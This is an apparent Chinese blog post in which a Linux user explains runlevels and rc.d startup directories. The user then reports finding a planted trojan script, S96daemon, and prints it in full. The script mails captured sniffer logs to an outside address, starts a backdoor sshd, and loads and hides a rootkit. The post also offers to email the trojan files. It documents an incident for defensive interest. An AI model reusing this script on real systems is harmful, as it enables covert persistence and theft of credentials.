by mutecat@byhh 2008.05.05

  木马通常会运行一个后台进程，大家知道/etc/rc.d目录下有rc0.d、rc1.d、rc2.d、

rc3.d、rc4.d、rc5.d、rc6.d这几个目录，linux有运行级别这个概念，可以通过

/etc/iniitab来了解每个级别的含义。

//这是redhat9下面inittab文件里面的
# Default runlevel. The runlevels used by RHS are:
#   0 – halt (Do NOT set initdefault to this)
#   1 – Single user mode
#   2 – Multiuser, without NFS (The same as 3, if you do not have networking)
#   3 – Full multiuser mode
#   4 – unused
#   5 – X11
#   6 – reboot (Do NOT set initdefault to this)
id:3:initdefault:

一般我们会使用0、3、5、6这几个级别， 3是字符界面，5是图形界面，0是关机，6是

重启，比如你在命令行敲入reboot，那么/etc/rc.d/rc6.d目录下的文件就会被执行，处理

重启之前的事情。对于每一个级别处理什么事情可以通过ntsysv –level来查看或者修改

，比如你想优化X11启动的速度可以通过ntsysv –level 5来关掉不必要的启动服务，相当

于XP的msconfig命令。

   既然rc.d目录有此等作用，也就自然而然成了众多木马选择的栖身之地，对于我的系统

启动的时候运行在级别3，所以进入/etc/rc.d/rc3.d目录，ls看了一下，怪只怪此“黑客

”粗心大意，植入的木马文件权限位和系统的不一样，用ls一眼就看出了，很是显眼，而

且起的名字也是相当的经典S96daemon。我们来看看这个文件守护进程执行了什么？

vi S96daemon
#!/bin/sh
cd /usr/bin/.tmp
./vad tcp.log >conturi.log
cat /usr/bin/.tmp/conturi.log|mail -s "back" inconjito@yahoo.com
rm -rf /usr/bin/.tmp/tcp.log
./sshd -f sshd_config
./httpd &
/sbin/insmod -f adore.o > /dev/null 2>&1
/sbin/insmod -f cleaner.o > /dev/null 2>&1
/sbin/rmmod cleaner > /dev/null 2>&1
./ava i `cat pid` > /dev/null 2>&1
./ava i `cat sniff.pid` > /dev/null 2>&1
./ava h . > /dev/null 2>&1
for i in {2,3,4,5}
do
./ava h /etc/rc.d/rc$i.d/S96daemon > /dev/null 2>&1
done
./ava h /proc/ksyms > /dev/null 2>&1

和Windows下的木马文件一样，大多是隐藏的，此木马执行文件位于/usr/bin/.tmp目录下

，隐蔽吧，cd到/usr/bin/.tmp看一下，下面有这些文件：

-rw-r–r–    1 root     root           48 May  4 16:46 conturi.log
-rwxr-xr-x    1 683      683         25107 May  4 16:46 damn
-rwxr-xr-x    1 root     ftp         20571 May  4 16:46 httpd
-rw-r–r–    1 root     root         5613 May  4 16:46 pid
-rwxr-xr-x    1 root     root        27890 May  4 16:46 pss
-rwxrw-r–    1 root     root       686451 May  2 04:42 sshd
-rw-r–r–    1 root     root          702 Feb 19  2006 sshd_config
-rw——-    1 root     root          541 Jul  2  2000 ssh_host_key
-rw——-    1 root     root          512 May  4 16:46 ssh_random_seed
drwxr-xr-x    2 1001     users        4096 May  4 18:02 tro
-rwxr-xr-x    1 root     root         4060 Sep 22  2000 vad
-rwxr-xr-x    1 683      683         17849 May  4 16:46 zbam

这就是此“黑客”使用的作案工具，无奈我是小白，暂时还搞不清楚完整的过程，只能暂

时把S96daemon禁用掉，有兴趣的可以研究一下，你要木马文件的话我也可以email给你。